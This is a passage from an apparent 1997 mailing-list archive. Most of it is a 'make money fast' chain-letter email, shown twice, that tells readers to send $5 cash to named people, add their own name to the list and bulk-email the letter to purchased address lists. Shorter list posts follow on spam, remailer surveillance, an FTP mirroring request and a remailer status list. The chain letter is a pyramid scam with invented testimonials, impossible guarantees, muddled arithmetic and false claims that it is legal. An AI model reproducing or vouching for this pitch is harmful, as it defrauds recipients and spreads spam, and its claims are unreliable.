REPORT from each of the four 4 names listed on the next page. For each REPORT, send $5 CASH and a SELF- ADDRESSED, STAMPED envelope (BUSINESS SIZE #10) to the person listed for the SPECIFIC REPORT. International orders should also include $1 extra for postage. In lieu of sending an self addressed, stamped envelope, you may simply include your email address if you wish to receive your report by email. It is essential that you specify the NAME and NUMBER of the report requested to the person you are ordering from. You will need ALL FOUR 4 REPORTS because you will be REPRINTING and RESELLING them. DO NOT alter the names or sequence other than what the instructions say. IMPORTANT: Always provide same-day service on all orders. Step (2) Replace the name and address under REPORT #1 with yours, moving the one that was there down to REPORT #2. Drop the name and address under REPORT #2 to REPORT #3, moving the one that was there to REPORT #4. The name and address that was under REPORT #4 is dropped from the list and this party is no doubt on the way to the bank. When doing this, make certain you type the names and addresses ACCURATELY! DO NOT MIX UP MOVING PRODUCT/REPORT POSITIONS!!! Step (3) Having made the required changes in the NAME list, save it as a text (.txt) file in it's own directory to be used with whatever email program you like. Again, REPORT #3 will tell you the best methods of bulk emailing and acquiring email lists. Step (4) Email a copy of the entire program (all of this is very important) to everyone whose address you can get your hands on. Start with friends and relatives since you can encourage them to take advantage of this fabulous money-making opportunity. That's what I did. And they love me now, more than ever. Then, email to anyone and everyone! Use your imagination! You can get email addresses from companies on the Internet who specialize in email mailing lists. These are very cheap, 100,000 addresses for around $35.00. IMPORTANT: You won't get a good response if you use an old list, so always request a FRESH, NEW list. You will find out where to purchase these lists when you order the four 4 REPORTS. ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!! REQUIRED REPORTS ***Order each REPORT by NUMBER and NAME*** ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE AND $5 CASH FOR EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER ________________________________________________________ REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" ORDER REPORT #1 FROM: Fredric Olsson Lillg�rda Hagestad 276 45 L�derup SWEDEN _______________________________________________________ REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES" ORDER REPORT #2 FROM: Johansen Inc. Bj�rk�ngsv�gen 26 504 78 Sandhult SWEDEN ________________________________________________________ REPORT #3 "SOURCES FOR THE BEST MAILING LISTS" ORDER REPORT #3 FROM: A. Valdus Trappv 2 517 37 Bollebygd SWEDEN ________________________________________________________ REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS" ORDER REPORT #4 FROM: MAS Enterprises 509 East Perry Street Savannah, Georgia 31401 ________________________________________________________ CONCLUSION I am enjoying my fortune that I made as I send out this program, hoping to give you a chance to make this kind of money. You too, will be making money in 20 to 90 days, if you follow the SIMPLE STEPS outlined in this mailing. To be financially independent is to be FREE. Free to make financial decisions as never before. Go into business, get into investments, retire or take a vacation. No longer will a lack of money hold you back. However, very few people reach financial independence, because when opportunity knocks, they choose to ignore it. It is much easier to say "NO" than "YES", and this is the question that you must answer. Will YOU ignore this amazing opportunity or will you take advantage of it? If you do nothing, you have indeed missed something and nothing will change. Please re-read this material, this is a special opportunity. If you have any questions, please feel free to write to the sender of this information. You will get a prompt and informative reply. My method is simple. I sell thousands of people a product for $5 that costs me pennies to produce and email. I should also point out that this program is legal and everyone who participates WILL make money. This is not a chain letter or pyramid scam. At times you have probably received chain letters, asking you to send money, on faith, but getting NOTHING in return, NO product what-so-ever! Not only are chain letters illegal, but the risk of someone breaking the chain makes them quite unattractive. You are offering a legitimate product to your people. They are obtaining information that will not only help them with this business venture but others as well. They also are obtaining the rights to reproduce the reports. After they purchase the product from you, they reproduce more and resell them. It's simple free enterprise. As you learned from the enclosed material, the PRODUCT is a series of four 4 FINANCIAL AND BUSINESS REPORTS. The information contained in these REPORTS will not only help you in making your participation in this program more rewarding, but will be useful to you in any other business decisions you make in the years ahead. You are also buying the rights to reprint all of the REPORTS, which will be ordered from you by those to whom you mail this program. The concise one and two page REPORTS you will be buying can easily be reproduced at a local copy center for a cost off about 3 cents a copy. Best wishes with the program and Good Luck! ------------------------------------Testimonials:-------------------------- --------- "I had received this program before. I threw it away, but later wondered if I shouldn't have given it a try. Of course, I had no idea who to contact to get a copy, so I had to wait until I was emailed another copy of the program. Eleven months passed, then it came. I DIDN'T throw this one away. I made $41,000 on the first try." Dawn W., Evansville, IN "My late father always told me, 'remember, Alan, there is no free lunch in life. You get out of life what you put into it.' Through trial and error and a somewhat slow frustrating start, I finally figured it out. The program works very well, I just had to find the right target group of people to email it to. So far this year, I have made over $63,000 using this program. I know my dad would have been very proud of me." Alan B., Philadelphia, PA "Not being the gambling type, it took me several weeks to make up my mind to participate in this program. But conservative as I am, I decided that the initial investment was so little that there was no way that I could not get enough orders to at least get my money back. BOY, was I ever surprised when I found my medium sized post office box crammed with orders! I will make more money this year than any ten years of my life before." Mary Riceland, Lansing, MI --------------------------------------------------------------------------- TIPS FOR SUCCESS Send for your four 4 REPORTS immediately so you will have them when the orders start coming in. When you receive a $5 order, you MUST send out the product/service to comply with US Postal and Lottery laws. Title 18 Sections 1302 and 1341 specifically state that: "A PRODUCT OR SERVICE MUST BE EXCHANGED FOR MONEY RECEIVED." WHILE YOU WAIT FOR THE REPORTS TO ARRIVE: 1. Name your new company. You can use your own name if you desire. 2. Get a post office box (preferred). 3. Edit the names and addresses on the program. You must remember, your name and address go next to REPORT #1 and the others all move down one, with the fourth one being bumped OFF the list. 4. Obtain as many email addresses as possible to send until you receive the information on mailing list companies in REPORT #3. (It is a good idea to purchase bulk email lists, which generally cost around $35.00 for 100,000 names. Or you can start out the way I did, simply mailing out a few hundred to acquaintances and people who post to newsgroups.) 5. Decide on the number of programs you intend to send out. The more you send, and the quicker you send them, the more money you will make. 6. After mailing the programs, get ready to fill the orders. 7. Copy the four 4 REPORTS so you are able to sent them out as soon as you receive an order. IMPORTANT: ALWAYS PROVIDE SAME-DAY SERVICE ON ORDERS YOU RECEIVE! 8. Make certain the letter and reports are neat and legible. --------------------------------------------------------------------------- --------------------------------- YOUR GUARANTEE The check point which GUARANTEES your success is simply this: you must receive 15 to 20 orders for REPORT #1. This is a must!!! If you don't within two weeks, email out more programs until you do. Then a couple of weeks later you should receive at least 100 orders for REPORT #2, if you don't, send out more programs until you do. Once you have received 100 or more orders for REPORT #2, (take a deep breath) you can sit back and relax, because YOU ARE GOING TO MAKE AT LEAST $50,000. Mathematically it is a proven guarantee. Of those who have participated in the program and reached the above GUARANTEES-ALL have reached their $50,000 goal. Also, remember, every time your name is moved down the list you are in front of a different REPORT, so you can keep track of your program by knowing what people are ordering from you. IT'S THAT EASY, REALLY, IT IS!!! REMEMBER: "HE WHO DARES NOTHING, NEED NOT HOPE FOR ANYTHING." "INVEST A LITTLE TIME, ENERGY AND MONEY NOW OR SEARCH FOR IT FOR THE REST OF YOUR LIFE." ---------------------------------------------------------------------------- SVENSKAR, L�S!!! Skicka 40 SKR (2x20) ist�llet f�r 5dollarsedlar f�r enkelhetens skull. Vem vill g� och v�xla 10000 femdollar sedlar??? Gl�m inte e-mail adressen i brevet med sedlarna s� du f�r dina reports! Ha ett bra liv! From Fredric_Olsson at hotmail.com Mon Aug 18 13:18:08 1997 From: Fredric_Olsson at hotmail.com (Fredric_Olsson at hotmail.com) Date: Mon, 18 Aug 1997 13:18:08 -0700 (PDT) Subject: Earn money fast and legal Message-ID: <> Dear friend, Please read the following information. The income opportunity is one you may be interested in. I am just an average person with basic computer knowledge and it has worked for me. It can be started with VERY MINIMAL outlay and the income return is TREMENDOUS! Please print this message and read it over twice. You will not regret it, I sure haven't! You will not receive another message from me, so there is no need to remove yourself from any list if you are not interested. I expect, however, you will be! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ You are about to make at least $50,000 - In less than 90 days Read the enclosed program...THEN READ IT AGAIN!... $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ THIS IS A LEGITIMATE and LEGAL money making opportunity. It does not require you to come into contact with people, do any hard work, and best of all, you never have to leave your house except to get the mail. If you believe that someday you'll get that big break, you may wait forever unless you act. This is a chance to act, and it will work. Simply follow the instructions and you will make a handsome profit for the few hours involved. Multi-level marketing (MLM) has gained national respectability. It is being taught at Harvard Business School and both Stanford Research and the Wall Street Journal have stated that between 50% and 65% of all goods and services will be sold through multi-level marketing by the late 1990s. This is a Billion-dollar industry and the of the 500,000 millionaires in the United States, 20% (100,000) have made their fortune in the last several years using MLM. Moreover, statistics show that approximately 45 people become millionaires each day through Multi-level marketing. -------------------------------------------------------------------------- The enclosed information is something I almost let slip through my fingers. Fortunately, sometime later I re-read everything and gave some thought and study to it. My name is Christopher Erickson. Two years ago, the corporation I worked at for the past twelve years down-sized and my position was eliminated. After unproductive job interviews, I decided to open my own business. Over the past year, I incurred many unforeseen financial problems. I owed my family, friends, and creditors over $35,000. The economy was taking a toll on my business and I just couldn't seem to make ends meet. I had to refinance and borrow against my home to support my family and struggling business. I truly believe it was wrong for me to be in debt like this. AT THAT MOMENT something significant happened in my life and I am writing to share my experience in hopes that this will change your life FOREVER....FINANCIALLY!!! In mid-December, I received this program via email. Six months prior to receiving this program I had been sending away for information on various business opportunities. All of the programs I received, in my opinion, were not cost effective. They were either too difficult for me to comprehend or the initial investment was too much for me to risk to see if they worked or not. One claimed I'd make a million dollars in one year...it didn't tell me I'd have to write a book to make it. But like I was saying, in December of '95 I received this program. I didn't send for it, or ask for it, they just got my name off a mailing list. THANK GOODNESS FOR THAT!!! After reading it several times, to make sure I was reading it correctly, I couldn't believe my eyes. Here was a MONEY-MAKING PHENOMENON. I could invest as much as I wanted to start, without putting me further in debt. After I got a pencil and paper and figured it out, I would at least get my money back. After determining that the program is LEGAL and NOT A CHAIN LETTER, I decided "WHY NOT". Initially I sent out 10,000 emails. It only cost me about $15.00 for my time on-line. The great thing about email is that I didn't need any money for printing to send out the program, only the cost to fulfill my orders. I am telling you like it is, I hope it doesn't turn you off, but I promised myself that I would not "rip-off" anyone, no matter how much money it cost me! (A good program to help do this is Stealth Mass Mailer, an email extracting and mass mail program which can be found @ http://www.mitent.com/stealth.html. Shop around, you may be able to find a better deal.) In less than one week, I was starting to receive orders for REPORT #1. By January 13th, I had received 26 orders for REPORT #1. When you read the GUARANTEE in the program, you will see that "YOU MUST RECEIVE 15 TO 20 ORDERS FOR REPORT #1 WITHIN TWO WEEKS. IF YOU DON'T, SEND OUT MORE PROGRAMS UNTIL YOU DO!" My first step in making $50,000 in 20 to 90 days was done. By January 30th, I had received 196 orders for REPORT #2. If you go back to the GUARANTEE, "YOU MUST RECEIVE 100 OR MORE ORDERS FOR REPORT #2 WITHIN TWO WEEKS. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO. ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL." Well, I had 196 orders for REPORT #2, 96 more than I needed. So I sat back and relaxed. By March 19th, of my emailing of 10,000, I received $58,000 with more coming in every day. I paid off ALL my debts and bought a much needed new car. Please take time to read the attached program, IT WILL CHANGE YOUR LIFE FOREVER! Remember, it wont work if you don't try it. This program does work, but you must follow it EXACTLY! Especially the rules of not trying to place your name in a different place. It doesn't work, you'll lose out on a lot of money! REPORT #2 explains this. Always follow the guarantee, 15 to 20 orders for REPORT #1, and 100 or more orders for REPORT #2 and you will make $50,000 or more in 20 to 90 days. I AM LIVING PROOF THAT IT WORKS !!! If you choose not to participate in this program, I'm sorry. It really is a great opportunity with little cost or risk to you. If you choose to participate, follow the program and you will be on your way to financial security. If you are a fellow business owner and you are in financial trouble like I was, or you want to start your own business, consider this a sign. I DID! Sincerely, Christopher Erickson P.S. Do you have any idea what 11,700 $5 bills ($58,000) look like piled up on a kitchen table? IT'S AWESOME! --------------------------------------------------------------------------- --------------------------------------- A NOTE FROM THE ORIGINATOR OF THIS PROGRAM By the time you have read the enclosed information and looked over the enclosed program and reports, you should have concluded that such a program, and one that is legal, could not have been created by an amateur. Let me tell you a little about myself. I had a profitable business for ten years. Then in 1979 my business began falling off. I was doing the same things that were previously successful for me, but it wasn't working. Finally, I figured it out. It wasn't me, it was the economy. Inflation and recession had replaced the stable economy that had been with us since 1945. I don't have to tell you what happened to the unemployment rate...because many of you know from first hand experience. There were more failures and bankruptcies than ever before. The middle class was vanishing. Those who knew what they were doing invested wisely and moved up. Those who did not, including those who never had anything to save or invest, were moving down into the ranks of the poor. As the saying goes, "THE RICH GET RICHER AND THE POOR GET POORER." The traditional methods of making money will never allow you to "move up" or "get rich", inflation will see to that. You have just received information that can give you financial freedom for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF EFFORT." You can make more money in the next few months than you have ever imagined. I should also point out that I will not see a penny of your money, nor anyone else who has provided a testimonial for this program. I have already made over FOUR MILLION DOLLARS! I have retired from the program after sending out over 16,000 programs. Now I have several offices which market this and several other programs here in the US and overseas. By the Spring, we wish to market the 'Internet' by a partnership with AMERICA ONLINE. Follow the program EXACTLY AS INSTRUCTED. Do not change it in any way. It works exceedingly well as it is now. Remember to email a copy of this exciting program to everyone that you can think of. One of the people you send this to may send out 50,000...and your name will be on every one of them!. Remember though, the more you send out, the more potential customers you will reach. So my friend, I have given you the ideas, information, materials and opportunity to become financially independent, IT IS UP TO YOU NOW! THINK ABOUT IT ! Before you delete this program from your mailbox, as I almost did, take a little time to read it and REALLY THINK ABOUT IT. Get a pencil and figure out what could happen when YOU participate. Figure out the worst possible response and no matter how you calculate it, you will still make a lot of money! Definitely get back what you invested. Any doubts you have will vanish when your first orders come in. IT WORKS! Paul Johnson, Raleigh, NC HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$ Let's say that you decide to start small, just to see how it goes, and we'll assume you and all those involved send out 2,000 programs each. Let's also assume that the mailing receives a .5% response. Using a good list the response could be much better. Also many people will send out hundreds of thousands of programs instead of 2,000. But continuing with this example, you send out only 2,000 programs. With a 5% response, that is only 10 orders for REPORT #1. Those 10 people respond by sending out 2,000 programs each for a total of 20,000. Out of those .5%, 100 people respond and order REPORT #2. Those 100 mail out 2,000 programs each for a total of 200,000. The .5% response to that is 1,000 orders for REPORT #3. Those 1,000 send out 2,000 programs each for a 2,000,000 total. The .5% response to that is 10,000 orders for REPORT #4. That's 10,000 five dollar bills for you. CASH!!!! Your total income in this example is $50 + $500 + $5000 + $50,000 for a total of $55,550!!!! REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU MAIL TO WILL DO ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM! DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE OR HALF SENT OUT 100,000 PROGRAMS INSTEAD OF ONLY 2,000. Believe me, many people will do that and more! By the way, your cost to participate in this is practically nothing. You obviously already have an Internet connection and email is FREE!!! REPORT #3 will show you the best methods for bulk emailing and purchasing email lists. THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY. It does not require you to come in contact with people, do any hard work, and best of all, you never have to leave the house except to get the mail. If you believe that someday you'll get that big break that you've been waiting for, THIS IS IT! Simply follow the instructions, and your dream will come true. This multi-level email order marketing program works perfectly...100% EVERY TIME. Email is the sales tool of the future. Take advantage of this non-commercialized method of advertising NOW!! The longer you wait, the more people will be doing business using email. Get your piece of this action!! INSTRUCTIONS We at Erris Mail Order Marketing Business, have a method of raising capital that REALLY WORKS 100% EVERY TIME. I am sure that you could use $50,000 to $125,000 in the next 20 to 90 days. Before you say "Bull", please read the program carefully. This is not a chain letter, but a perfectly legal money making opportunity. Basically, this is what we do: As with all multi-level business, we build our business by recruiting new partners and selling our products. Every state in the USA allows you to recruit new multi- level business partners, and we offer a product for EVERY dollar sent. YOUR ORDERS COME AND ARE FILLED THROUGH THE MAIL, so you are not involved in personal selling. You do it privately in your own home, store or office. This is the GREATEST Multi-level Mail Order Marketing anywhere: Step (1) Order all four 4 REPORTS listed by NAME AND NUMBER. Do this by ordering the REPORT from each of the four 4 names listed on the next page. For each REPORT, send $5 CASH and a SELF- ADDRESSED, STAMPED envelope (BUSINESS SIZE #10) to the person listed for the SPECIFIC REPORT. International orders should also include $1 extra for postage. In lieu of sending an self addressed, stamped envelope, you may simply include your email address if you wish to receive your report by email. It is essential that you specify the NAME and NUMBER of the report requested to the person you are ordering from. You will need ALL FOUR 4 REPORTS because you will be REPRINTING and RESELLING them. DO NOT alter the names or sequence other than what the instructions say. IMPORTANT: Always provide same-day service on all orders. Step (2) Replace the name and address under REPORT #1 with yours, moving the one that was there down to REPORT #2. Drop the name and address under REPORT #2 to REPORT #3, moving the one that was there to REPORT #4. The name and address that was under REPORT #4 is dropped from the list and this party is no doubt on the way to the bank. When doing this, make certain you type the names and addresses ACCURATELY! DO NOT MIX UP MOVING PRODUCT/REPORT POSITIONS!!! Step (3) Having made the required changes in the NAME list, save it as a text (.txt) file in it's own directory to be used with whatever email program you like. Again, REPORT #3 will tell you the best methods of bulk emailing and acquiring email lists. Step (4) Email a copy of the entire program (all of this is very important) to everyone whose address you can get your hands on. Start with friends and relatives since you can encourage them to take advantage of this fabulous money-making opportunity. That's what I did. And they love me now, more than ever. Then, email to anyone and everyone! Use your imagination! You can get email addresses from companies on the Internet who specialize in email mailing lists. These are very cheap, 100,000 addresses for around $35.00. IMPORTANT: You won't get a good response if you use an old list, so always request a FRESH, NEW list. You will find out where to purchase these lists when you order the four 4 REPORTS. ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!! REQUIRED REPORTS ***Order each REPORT by NUMBER and NAME*** ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE AND $5 CASH FOR EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER ________________________________________________________ REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" ORDER REPORT #1 FROM: Fredric Olsson Lillg�rda Hagestad 276 45 L�derup SWEDEN _______________________________________________________ REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES" ORDER REPORT #2 FROM: Johansen Inc. Bj�rk�ngsv�gen 26 504 78 Sandhult SWEDEN ________________________________________________________ REPORT #3 "SOURCES FOR THE BEST MAILING LISTS" ORDER REPORT #3 FROM: A. Valdus Trappv 2 517 37 Bollebygd SWEDEN ________________________________________________________ REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS" ORDER REPORT #4 FROM: MAS Enterprises 509 East Perry Street Savannah, Georgia 31401 ________________________________________________________ CONCLUSION I am enjoying my fortune that I made as I send out this program, hoping to give you a chance to make this kind of money. You too, will be making money in 20 to 90 days, if you follow the SIMPLE STEPS outlined in this mailing. To be financially independent is to be FREE. Free to make financial decisions as never before. Go into business, get into investments, retire or take a vacation. No longer will a lack of money hold you back. However, very few people reach financial independence, because when opportunity knocks, they choose to ignore it. It is much easier to say "NO" than "YES", and this is the question that you must answer. Will YOU ignore this amazing opportunity or will you take advantage of it? If you do nothing, you have indeed missed something and nothing will change. Please re-read this material, this is a special opportunity. If you have any questions, please feel free to write to the sender of this information. You will get a prompt and informative reply. My method is simple. I sell thousands of people a product for $5 that costs me pennies to produce and email. I should also point out that this program is legal and everyone who participates WILL make money. This is not a chain letter or pyramid scam. At times you have probably received chain letters, asking you to send money, on faith, but getting NOTHING in return, NO product what-so-ever! Not only are chain letters illegal, but the risk of someone breaking the chain makes them quite unattractive. You are offering a legitimate product to your people. They are obtaining information that will not only help them with this business venture but others as well. They also are obtaining the rights to reproduce the reports. After they purchase the product from you, they reproduce more and resell them. It's simple free enterprise. As you learned from the enclosed material, the PRODUCT is a series of four 4 FINANCIAL AND BUSINESS REPORTS. The information contained in these REPORTS will not only help you in making your participation in this program more rewarding, but will be useful to you in any other business decisions you make in the years ahead. You are also buying the rights to reprint all of the REPORTS, which will be ordered from you by those to whom you mail this program. The concise one and two page REPORTS you will be buying can easily be reproduced at a local copy center for a cost off about 3 cents a copy. Best wishes with the program and Good Luck! ------------------------------------Testimonials:-------------------------- --------- "I had received this program before. I threw it away, but later wondered if I shouldn't have given it a try. Of course, I had no idea who to contact to get a copy, so I had to wait until I was emailed another copy of the program. Eleven months passed, then it came. I DIDN'T throw this one away. I made $41,000 on the first try." Dawn W., Evansville, IN "My late father always told me, 'remember, Alan, there is no free lunch in life. You get out of life what you put into it.' Through trial and error and a somewhat slow frustrating start, I finally figured it out. The program works very well, I just had to find the right target group of people to email it to. So far this year, I have made over $63,000 using this program. I know my dad would have been very proud of me." Alan B., Philadelphia, PA "Not being the gambling type, it took me several weeks to make up my mind to participate in this program. But conservative as I am, I decided that the initial investment was so little that there was no way that I could not get enough orders to at least get my money back. BOY, was I ever surprised when I found my medium sized post office box crammed with orders! I will make more money this year than any ten years of my life before." Mary Riceland, Lansing, MI --------------------------------------------------------------------------- TIPS FOR SUCCESS Send for your four 4 REPORTS immediately so you will have them when the orders start coming in. When you receive a $5 order, you MUST send out the product/service to comply with US Postal and Lottery laws. Title 18 Sections 1302 and 1341 specifically state that: "A PRODUCT OR SERVICE MUST BE EXCHANGED FOR MONEY RECEIVED." WHILE YOU WAIT FOR THE REPORTS TO ARRIVE: 1. Name your new company. You can use your own name if you desire. 2. Get a post office box (preferred). 3. Edit the names and addresses on the program. You must remember, your name and address go next to REPORT #1 and the others all move down one, with the fourth one being bumped OFF the list. 4. Obtain as many email addresses as possible to send until you receive the information on mailing list companies in REPORT #3. (It is a good idea to purchase bulk email lists, which generally cost around $35.00 for 100,000 names. Or you can start out the way I did, simply mailing out a few hundred to acquaintances and people who post to newsgroups.) 5. Decide on the number of programs you intend to send out. The more you send, and the quicker you send them, the more money you will make. 6. After mailing the programs, get ready to fill the orders. 7. Copy the four 4 REPORTS so you are able to sent them out as soon as you receive an order. IMPORTANT: ALWAYS PROVIDE SAME-DAY SERVICE ON ORDERS YOU RECEIVE! 8. Make certain the letter and reports are neat and legible. --------------------------------------------------------------------------- --------------------------------- YOUR GUARANTEE The check point which GUARANTEES your success is simply this: you must receive 15 to 20 orders for REPORT #1. This is a must!!! If you don't within two weeks, email out more programs until you do. Then a couple of weeks later you should receive at least 100 orders for REPORT #2, if you don't, send out more programs until you do. Once you have received 100 or more orders for REPORT #2, (take a deep breath) you can sit back and relax, because YOU ARE GOING TO MAKE AT LEAST $50,000. Mathematically it is a proven guarantee. Of those who have participated in the program and reached the above GUARANTEES-ALL have reached their $50,000 goal. Also, remember, every time your name is moved down the list you are in front of a different REPORT, so you can keep track of your program by knowing what people are ordering from you. IT'S THAT EASY, REALLY, IT IS!!! REMEMBER: "HE WHO DARES NOTHING, NEED NOT HOPE FOR ANYTHING." "INVEST A LITTLE TIME, ENERGY AND MONEY NOW OR SEARCH FOR IT FOR THE REST OF YOUR LIFE." ---------------------------------------------------------------------------- SVENSKAR, L�S!!! Skicka 40 SKR (2x20) ist�llet f�r 5dollarsedlar f�r enkelhetens skull. Vem vill g� och v�xla 10000 femdollar sedlar??? Gl�m inte e-mail adressen i brevet med sedlarna s� du f�r dina reports! Ha ett bra liv! From dlv at bwalk.dm.com Sun Aug 17 23:43:06 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 18 Aug 1997 14:43:06 +0800 Subject: Picketing With Packets In-Reply-To: Message-ID: <1BBmBe2w165w@bwalk.dm.com> ? the Platypus {aka David Formosa} writes: > On Sat, 16 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > > > In all fairness, in addition to Stanford Wallace, there are several > > other spammers sending out junk e-mail. If you completely eliminate > > Stanford and his company, you will STILL get junk e-mail. > > Of cause this is true, but he is one of the beggest and thus gets the > most attention. If we can stop him we cut down alot of email spam and we > can move on the smaller one. Its like optimising code, you find where > its taken most of its time and you optimise that. He's the loudest one. However in the week his system has been down, the amount of shit from Quantcom, newvest, etc hasn't subsided. > > Perhaps this will spark another round of a cypherpunk discussion of > > technical solutions to junk e-mail... > > Hopefully, the spammers are just as effective censors as the goverment > is IMHO. The answer is a technical solution that doesn't let the spammers drown out a discussion, if that's what you mean by censorship. > > I placed myself on a zillion "remove" lists. Now I no longer get any > > junk e-mail of interest (which I did on rare occasions), > > I'm haveing trubble parsing this message, do you mean that you are not > getting any junk e-mail that you are interested in? I mean, I used to get more unsolicited junk mail, which I deleted, but occasionally I saw something of moderate interest - say, someone selling blank CDR media reasonably cheap (not that I'd buy them from someone advertizing this way). Now all I get is pure crap. :-) > > but still get at least once a day an MMF > > I think this is a diffrent class of posting. Thouse peaple who post MMF > do it from ignorence and stupidity, while this dosn't make what thay have > done any less harmfull, it means that it has to be fixxed in a diffrent > way to normal UCE. For reasons unknown, I seem to be on someone's mailing list for MMF's - I get A LOT of them in e-mail :-( --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From nobody at REPLAY.COM Mon Aug 18 01:51:19 1997 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 18 Aug 1997 16:51:19 +0800 Subject: Remailer hating Nazis Message-ID: <199708180834.KAA03366@basement.replay.com> Anonymous wrote: > There are lots of good reasons to use remailers, but thinking that you are > not responsible for your actions is not one of them. Anything you send > may be around to haunt you for many years to come. > If you believe that any computer sytem is foolproof... you have a lot to > learn. There is always a possibility that people will found out your real > identity and where you live, through a human error or a flaw in the > remailer. (Right, toto?). Right, small, warm-blooded creature. There are a plethora of available avenues for surruptitious agents to exploit InterNet technology and methodology in order to reveal both your identity and the content of your communications. To truly achieve anonymity and privacy, one should be prepared to use the strictest standards of paranoia, the full capabilities of privacy and anonymity tools, and personal methodologies aimed at thwarting unlikely and/or impossible surveillance techniques as well as the currently known methods. Beyond the mere technology itself, one must consider the possibile use of psychological manipulation of individuals and groups into a specific mindset that, combined with an analysis of the individual's natural psychological profile, can enable a surreptitious entity to move the individual toward patterns or processes which will make the technological tools of identity and information analysis more effective. For example, take the fictitious case wherein an individual is prone to using only two different remailers, say, for instance, the remailer at c2net and the remailer at dhp.com. Suppose that the remailer at c2net was being monitored surreptitiously by an agent who had access to their system, but either had no way to access messages encrypted to the remailer, or their efforts to monitor the remailer seemed to be thwarted at times by another, unknown entity with access to the system. The surreptitious agent could arrange to have the c2net remailer shut down under some pretext, and seed the monitored individual's private email, mailing lists, and newsgroups with subtle pointers/suggestions as to the reliability/security, etc., of another remailer which was more securely under the agent's control, say, for instance, a remailer at replay.com. After the monitored individual has begun using the remailer at replay.com, then the agent would proceed to do the same thing in regard to the remailer at dhp.com, and another remailer controlled by the agent or associates of the agent, say, for instance the remailer at cypherpunks.ca. The agent is now in a postion to have the majority of the monitored individual's communications vulnerable to identity, information and traffic analysis, and thus will have an enormous amount of information to work with should the individual occasionally spread their anonymous communications through remailers that the agent may have less complete access to. If we suppose that the agent also is able to manipulate the monitored individual into sending the agent email that is encrypted to several recipients, including the agent or the agent's associates, then we see that the agent now has an even broader database of known information which can be analyzed to provide clues as to the identity of and the information sent by others who communicate with the individual who is being monitored. This fictitious example, if it came to pass, would serve to provide information to the agent which could be used to more effeciently target those who would be subjected to more restricted forms of surveillance, such as monitoring of the physical signals given off by their computer, keyboard, and monitor. All in all, the small, warm-blooded creature is correct in implying that one should always keep a shotgun by their computer, in the firm knowledge that the dogs of war do not always bark to announce their omnipresence. > Greets to all my friends in domestic surveilance. And greets to all of my friends who are watching your friends. Anonymous ReMonger From shamrock at netcom.com Mon Aug 18 04:58:25 1997 From: shamrock at netcom.com (Lucky Green) Date: Mon, 18 Aug 1997 19:58:25 +0800 Subject: FTP site mirroring script Message-ID: <3.0.2.32.19970818044933.006f82d8@netcom10.netcom.com> Would somebody please point me to a solid FTP site mirroring script? Thanks, --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From raph at CS.Berkeley.EDU Mon Aug 18 07:08:23 1997 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 18 Aug 1997 22:08:23 +0800 Subject: List of reliable remailers Message-ID: <199708181350.GAA10091@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{'cyber'} = ' alpha pgp'; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"jam"} = " cpunk mix pgp hash middle latent cut ek"; $remailer{"winsock"} = " cpunk pgp pgponly hash cut ksub reord ?"; $remailer{'nym'} = ' newnym pgp'; $remailer{"squirrel"} = " cpunk mix pgp pgponly hash latent cut ek"; $remailer{'weasel'} = ' newnym pgp'; $remailer{"reno"} = " cpunk mix pgp hash middle latent cut ek reord ?"; $remailer{"cracker"} = " cpunk mix remix pgp hash esub latent cut ek reord"; $remailer{'redneck'} = ' newnym pgp'; $remailer{"bureau42"} = " cpunk mix pgp ksub hash latent cut ek"; $remailer{"neva"} = " cpunk pgp pgponly hash cut ksub ?"; $remailer{"lcs"} = " mix"; $remailer{"medusa"} = " mix middle" $remailer{"McCain"} = " mix middle"; $remailer{"valdeez"} = " cpunk pgp pgponly hash ek"; $remailer{"arrid"} = " cpunk pgp pgponly hash ek"; $remailer{"hera"} = " cpunk pgp pgponly hash ek"; 